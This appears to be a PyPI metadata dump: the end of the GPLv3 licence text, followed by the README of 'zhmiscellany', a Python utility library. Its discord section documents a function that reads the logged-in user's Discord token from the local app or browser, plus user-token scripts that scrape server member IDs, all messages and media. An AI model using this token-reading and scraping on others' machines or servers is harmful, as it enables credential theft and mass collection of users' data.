permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>. Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: <program> Copyright (C) <year> <name of author> This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see <https://www.gnu.org/licenses/>. The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read <https://www.gnu.org/licenses/why-not-lgpl.html>. | TOC, theory of constraints, current reality tree, evaporation cloud, conflict resolution diagram, thinking processes | [
"Intended Audience :: Education",
"Intended Audience :: Manufacturing",
"Intended Audience :: Science/Research",
"Intended Audience :: Other Audience",
"Topic :: Documentation",
"Topic :: Office/Business",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"graphviz",
"drawpyo"
] | [] | [] | [] | [] | twine/6.0.1 CPython/3.12.3 | 2026-02-20T09:37:20.608452 | thinking_processes-1.5.1.tar.gz | 50,912 | d8/a2/ef519c871956dcf71abf8ac0f0136bacb02c783f87700ddc4dc0efc6df51/thinking_processes-1.5.1.tar.gz | source | sdist | null | false | 7510de1d280bbd67badff2f04fb9069c | 5f49896f6d060c5ada11bb0dd4a8a6e56a1e97e892d0c18fc51e814212b6100f | d8a2ef519c871956dcf71abf8ac0f0136bacb02c783f87700ddc4dc0efc6df51 | null | [] | 216 |
2.1 | zhmiscellany | 6.5.6 | A collection of useful/interesting python libraries made by zh. | `zhmiscellany`,
=
An organized collection of unique and useful functions/classes/modules/bindings.
-
[Introduction](https://github.com/zen-ham/zhmiscellany/tree/master#Introduction)\
[Documentation](https://github.com/zen-ham/zhmiscellany/tree/master#Documentation)\
[](https://pepy.tech/projects/zhmiscellany) [](https://pepy.tech/projects/zhmiscellany) 
---
Introduction
===
Can be installed with `pip install zhmiscellany`
Supports Linux! (Some functionality reduced)
Currently, the package stands at 149 functions/classes/bindings across 15 modules.
The git repository for this package can be found [here](https://github.com/zen-ham/zhmiscellany). The docs also look nicer on github.
If you wish to reach out, you may add @z_h_ on Discord, or join [the server](https://discord.gg/ThBBAuueVJ).
Believe it or not this package is not a monolith, I've split off some functionality into a handful of other packages to keep zhmiscellany from becoming too bloated: [zhmiscellanygsudo](https://pypi.org/project/zhmiscellanygsudo/), [zhmiscellanyocr](https://pypi.org/project/zhmiscellanyocr/), [zhmiscellanyrusteffect](https://pypi.org/project/zhmiscellanyrusteffect/).
---
Documentation:
===
[Usage-examples](https://github.com/zen-ham/zhmiscellany/blob/master/README.md#usage-examples) Usage examples for the discord module.\
[zhmiscellany.discord](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanydiscord) Functions for interacting with discord in various ways.\
[zhmiscellany.rust](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanyrust) Various rust bindings aimed towards speed.\
[zhmiscellany.cpp](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanycpp) Various C++ bindings aimed towards speed.\
[zhmiscellany.macro](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanymacro) Functions with very high flexibility and speed for simulating interactions with mouse and keyboard.\
[zhmiscellany.fileio](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanyfileio) Functions for interacting with local files, such as pickle, json and other file related functions I find useful.\
[zhmiscellany.string](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanystring) Functions for interacting with/generating strings that I find useful.\
[zhmiscellany.math](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanymath) Functions for making some calculations easier.\
[zhmiscellany.netio](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanynetio) Internet related functions that didn't make sense in any other module.\
[zhmiscellany.image](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanyimage) Functions for quantifying and manipulating images.\
[zhmiscellany.list](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanylist) Functions for manipulating lists.\
[zhmiscellany.dict](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanydict) Functions for working with dicts.\
[zhmiscellany.processing](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanyprocessing) Functions for processing/multiprocessing using flexible high level ray wrappers, homebrew high level multiprocessing implementations, or in threads in a more straight forward way.\
[zhmiscellany.misc](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanymisc) Miscellaneous functions that didn't fit anywhere else. There's alot of useful stuff here.\
[zhmiscellany.pipes](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanypipes) Classes and functions for effectively using pipes for IPC (Inter-Process Communication)\
[zhmiscellany.gui](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanygui) GUI related utilities for quickly adding visual components where it's needed.
Usage examples
===
A script that caches and prints out the user IDs of all the members in a server.
```py
import zhmiscellany
members = zhmiscellany.discord.scrape_guild(user_token=zhmiscellany.discord.get_local_discord_user()[0], guild_id='1162030646424768562', channel_id='1162031219471556629')
for member_id in members:
print(member_id)
```
#
A script that downloads all messages from a server and caches them (aka stores data in json files), Then downloads all the found media files, with print-outs of ETA, % complete, etc.
```py
import zhmiscellany, time, os, re
guild_channels = zhmiscellany.discord.get_guild_channels(zhmiscellany.discord.get_local_discord_user()[0], '1001978777892552884')
channels_message_data = []
for channel in guild_channels:
channels_message_data.append(zhmiscellany.discord.get_channel_messages(zhmiscellany.discord.get_local_discord_user()[0], channel['id']))
media_dir = r'/scraped_media'
urls = []
count = 0
for messages in channels_message_data:
for message in messages:
for attachment in message['attachments']:
if any(c in attachment['url'].lower() for c in ['.mp4', '.jpg', '.png', '.webp', '.mp3']):
count += 1
url = attachment['url'].split('?')[0]
urls.append(url)
total = count
eta_count = count
timestamps = []
count = 0
for url in urls:
count += 1
print(url)
print(f'{count}, {zhmiscellany.math.smart_percentage(count, total)}%, ETA {zhmiscellany.math.calculate_eta(timestamps, eta_count)}')
downloaded = (zhmiscellany.netio.download_file(url, f'{media_dir}\\{zhmiscellany.fileio.convert_name_to_filename(url)}', os.path.splitext(url)[1].lower()))
if downloaded:
timestamps.append(time.time())
else:
eta_count -= 1
```
#
A script that reposts messages you've sent in one channel to many other channels.
```py
import zhmiscellany, time
from_channel = '1122614930617683975'
post_channels = ['880703742096326677', '1141178363885670505']
amount_of_messages = 3
messages = zhmiscellany.discord.get_channel_messages(user_token=zhmiscellany.discord.get_local_discord_user()[0], channel_id=from_channel, limit=amount_of_messages, use_cache=False)
messages.reverse()
for channel in post_channels:
for message in messages:
if message['author']['id'] == zhmiscellany.discord.get_local_discord_user()[2]:
content = message['content']
attachments = []
for i in message['attachments']:
attachments.append(i['url'])
if len(attachments) > 0:
if len(content) > 0:
content = f'{content} {" ".join(attachments)}'
else:
content = " ".join(attachments)
zhmiscellany.discord.send_message(zhmiscellany.discord.get_local_discord_user()[0], content, channel)
print(content)
time.sleep(1)
```
#
A script that reacts to a bunch of messages in multiple channels, with print-outs of ETA, % complete, etc.
```py
import zhmiscellany, time
channel_ids = ['926310071435145256', '880703742096326677']
channels_message_data = []
amount_of_messages = 100
emojis = ['🇦🇺']
for ide in channel_ids:
channels_message_data.append(zhmiscellany.discord.get_channel_messages(user_token=zhmiscellany.discord.get_local_discord_user()[0], channel_id=ide, limit=amount_of_messages, use_cache=False))
ids = []
count = 0
for messages in channels_message_data:
for message in messages:
count += 1
ide = [message['id'], message['channel_id']]
ids.append(ide)
total = count
eta_count = count
timestamps = []
count = 0
for ide in ids:
count += 1
print(f'{count}, {zhmiscellany.math.smart_percentage(count, eta_count)}%, ETA {zhmiscellany.math.calculate_eta(timestamps, eta_count)}')
zhmiscellany.discord.add_reactions_to_message(zhmiscellany.discord.get_local_discord_user()[0], emojis, ide[1], ide[0])
timestamps.append(time.time())
```
#
A script that prints out the URLs to all the attachments on a message.
```py
import zhmiscellany
message_url = 'https://discord.com/channels/1001978777892552884/1064070189324435466/1162434625092718623'
message = zhmiscellany.discord.get_message(zhmiscellany.discord.get_local_discord_user()[0], zhmiscellany.discord.message_url_to_ids(message_url)[1], zhmiscellany.discord.message_url_to_ids(message_url)[2])
for attachment in message['attachments']:
url = attachment['url']
print(url)
```
---
`zhmiscellany.discord`
---
`zhmiscellany.discord.add_reactions_to_message()`
---
`zhmiscellany.discord.add_reactions_to_message(user_token, message_url, emojis)`
Reacts to a message with the given emoji(s).
example:
```py
import zhmiscellany
zhmiscellany.discord.add_reactions_to_message(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
emojis=['🦛', '🇦🇺'],
channel_id='263894734190280704',
message_id='263894769158062082'
)
```
#
`zhmiscellany.discord.get_channel_messages()`
---
`get_channel_messages(user_token, channel_id, limit = 0, use_cache = True)`
Gets any amount of messages from a channel.\
Can also cache the data locally, so that it won't have to re download them when ran for a second time.
example:
```py
import zhmiscellany
last_1000_messages = zhmiscellany.discord.get_channel_messages(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
channel_id='263894734190280704',
limit=1000,
use_cache=False
)
```
#
`zhmiscellany.discord.get_local_discord_user()`
---
`zhmiscellany.discord.get_local_discord_user()`
Gets info about the local user, allows code to be run without needing to find your user token every time.\
So if the user is logged into discord on the app or in the browser (on windows) this function can return the data, which can really streamline things.
example:
```py
import zhmiscellany
user_data = zhmiscellany.discord.get_local_discord_user()
user_token = user_data[0]
```
#
`zhmiscellany.discord.get_guild_channels()`
---
`zhmiscellany.discord.get_guild_channels(user_token, guild_id, use_cache=True)`
Gets a dict of all the channels in a server. This one can also cache the data locally, so that it runs instantly the second time around.
example:
```py
import zhmiscellany
guild_channels = zhmiscellany.discord.get_guild_channels(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
guild_id='880697939016695850',
use_cache=True
)
channel_ids = [channel['id'] for channel in guild_channels]
```
#
`zhmiscellany.discord.send_message()`
---
`zhmiscellany.discord.send_message(user_token, text, channel_id)`
Sends a message in a channel.
example:
```py
import zhmiscellany
zhmiscellany.discord.send_message(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
text='Hello, every nyan!',
channel_id='263894734190280704')
```
#
`zhmiscellany.discord.get_message()`
---
`zhmiscellany.discord.get_message(user_token, channel_id, message_id)`
Gets a message from a channel.
example:
```py
import zhmiscellany
message = zhmiscellany.discord.get_message(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
channel_id='263894734190280704',
message_id='263894769158062082'
)
content = message['content']
```
#
`zhmiscellany.discord.ids_to_message_url()`
---
`zhmiscellany.discord.ids_to_message_url(channel_id, message_id, guild_id = None)`
Turns ids into a message url. Direct messages don't have a guild id, so the guild_id argument is optional depending on if the message is in a guild channel or a DM channel.
example:
```py
import zhmiscellany
messagw_url = zhmiscellany.discord.ids_to_message_url(
guild_id='880697939016695850',
channel_id='880703742096326677',
message_id='880726566118768640'
)
```
#
`zhmiscellany.discord.message_url_to_ids()`
---
`zhmiscellany.discord.message_url_to_ids(message_url)`
Turns a message URL into its respective IDs.
example:
```py
import zhmiscellany
message_ids = zhmiscellany.discord.message_url_to_ids(
'https://discord.com/channels/880697939016695850/880703742096326677/880726566118768640'
)
guild_id = message_ids[0]
channel_id = message_ids[1]
message_id = message_ids[2]
```
#
`zhmiscellany.discord.scrape_guild()`
---
`scrape_guild(guild_id, channel_id, user_token, use_cache=True, console=False)`
Turns a message URL into its respective IDs.
example:
```py
import zhmiscellany
members = zhmiscellany.discord.scrape_guild(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
guild_id='1162030646424768562',
channel_id='1162031219471556629'
)
for member_id in members:
print(member_id)
```
`zhmiscellany.discord.send_type()`
---
`send_type(user_token, channel_id)`
Sends an API request to make it seem like the user is typing in the channel, for 10 seconds.
#
`zhmiscellany.discord.decode_user_id()`
---
`decode_user_id(user_token)`
Decodes any token to user id.
#
`zhmiscellany.discord.get_guilds()`
---
`get_guilds(user_token, use_cache=True)`
Gets info of all guilds the user is in.
#
`zhmiscellany.discord.get_dm_channels()`
---
`get_dm_channels(user_token, use_cache=True)`
Gets info on all DM channels the user has.
#
`zhmiscellany.discord.get_invite_info()`
---
`get_invite_info(user_token, invite_code, use_cache=True)`
Gets info on any invite code.
#
`zhmiscellany.discord.generate_server_invite()`
---
`generate_server_invite(user_token, channel_id)`
Generates a valid invite to any server the user is in.
#
`zhmiscellany.discord.get_approximate_member_count()`
---
`get_approximate_member_count(user_token, channel_id, use_cache=True)`
Gets an approximate member count for any server the user is in. For small servers the count is fully accurate, only for very large servers is it possibly inaccurate.
#
`zhmiscellany.discord.id_to_timestamp()`
---
`id_to_timestamp(id)`
Converts a discord id to a unix timestamp.
#
`zhmiscellany.discord.timestamp_to_id()`
---
`timestamp_to_id(timestamp)`
Converts a unix timestamp to a discord id.
#
`zhmiscellany.discord.get_user_avatar_url()`
---
`get_user_avatar_url(user_token, user_id, use_cache=True)`
Gets a URL to the image someone is using as their avatar.
#
`zhmiscellany.dict`
---
`zhmiscellany.dict.print_dict()`
---
`zhmiscellany.dict.print_dict(ldict)`
Prints out a dict in a readable way.
#
---
`zhmiscellany.fileio`
---
`zhmiscellany.fileio.read_json_file()`
---
`zhmiscellany.fileio.read_json_file(file_path)`
Reads json data from a json file and returns it as a dict.
#
`zhmiscellany.fileio.write_json_file()`
---
`zhmiscellany.fileio.write_json_file(file_path, data)`
Writes a dict to a json file.
#
`zhmiscellany.fileio.create_folder()`
---
`zhmiscellany.fileio.create_folder(folder_name)`
Creates a folder.
#
`zhmiscellany.fileio.remove_folder()`
---
`zhmiscellany.fileio.remove_folder(folder_name)`
Removes a folder and all contents.
#
`zhmiscellany.fileio.base_name_no_ext()`
---
`zhmiscellany.fileio.base_name_no_ext(file_path)`
Get the name of a file without the ext.
#
`zhmiscellany.fileio.convert_name_to_filename()`
---
`zhmiscellany.fileio.convert_name_to_filename(name)`
Convert a URL like name to a file system like name.
#
`zhmiscellany.fileio.convert_filename_to_name()`
---
`zhmiscellany.fileio.convert_filename_to_name(filename)`
Convert a file system like name back to a URL like name.
#
`zhmiscellany.fileio.recursive_copy_files()`
---
`zhmiscellany.fileio.recursive_copy_files(source_dir, destination_dir, prints=False)`
Copy all the files from a source directory and into a destination directory.
#
`zhmiscellany.fileio.empty_directory()`
---
`zhmiscellany.fileio.empty_directory(directory_path)`
Delete all the files in a directory but not the directory itself.
#
`zhmiscellany.fileio.abs_listdir()`
---
`zhmiscellany.fileio.abs_listdir(path)`
List the files in a directory, returns absolute paths.
#
`zhmiscellany.fileio.delete_ends_with()`
---
`zhmiscellany.fileio.delete_ends_with(directory, string_endswith, avoid=[])`
Delete all the files in a directory that end with a string, optional list of what files to avoid.
#
`zhmiscellany.fileio.read_bytes_section()`
---
`zhmiscellany.fileio.read_bytes_section(file_path, section_start, section_end)`
Read a section of a file without reading the whole thing.
#
`zhmiscellany.fileio.copy_file_with_overwrite()`
---
`zhmiscellany.fileio.copy_file_with_overwrite(src, dst)`
Copies and overwrites a file.
#
`zhmiscellany.fileio.fast_dill_dumps()`
---
`zhmiscellany.fileio.fast_dill_dumps(object)`
Pickle is alot faster than dill, so this function automatically determines which to use, if pickle is available it will use that for speed, else it will simply fall back to dill.
#
`zhmiscellany.fileio.fast_dill_loads()`
---
`zhmiscellany.fileio.fast_dill_loads(data)`
Same idea as fast_dill_dumps but it loads instead of dumps.
#
`zhmiscellany.fileio.save_object_to_file()`
---
`zhmiscellany.fileio.save_object_to_file(object, file_name, compressed=False)`
Saves an object to a file, uses fast_dill_dumps.
#
`zhmiscellany.fileio.load_object_from_file()`
---
`zhmiscellany.fileio.load_object_from_file(file_name, compressed=False)`
Designed to be used along with save_object_to_file but loads instead of saves.
#
`zhmiscellany.fileio.pickle_and_encode()`
---
`zhmiscellany.fileio.pickle_and_encode(obj)`
Pickles an object with fast_dill_dumps, compresses it and encodes it to a URL-safe string.
#
`zhmiscellany.fileio.decode_and_unpickle()`
---
`zhmiscellany.fileio.decode_and_unpickle(encoded_str)`
Designed to be used with pickle_and_encode, simply does the opposite thing and returns an object.
#
`zhmiscellany.fileio.list_files_by_modified_time()`
---
`zhmiscellany.fileio.list_files_by_modified_time(directory)`
Lists the files in a directory ordered by modified time.
#
`zhmiscellany.fileio.get_script_path()`
---
`zhmiscellany.fileio.get_script_path()`
Gets the path to the current file, it also supports PyInstaller EXEs, in which case it will return the path to the EXE.
#
`zhmiscellany.fileio.chdir_to_script_dir()`
---
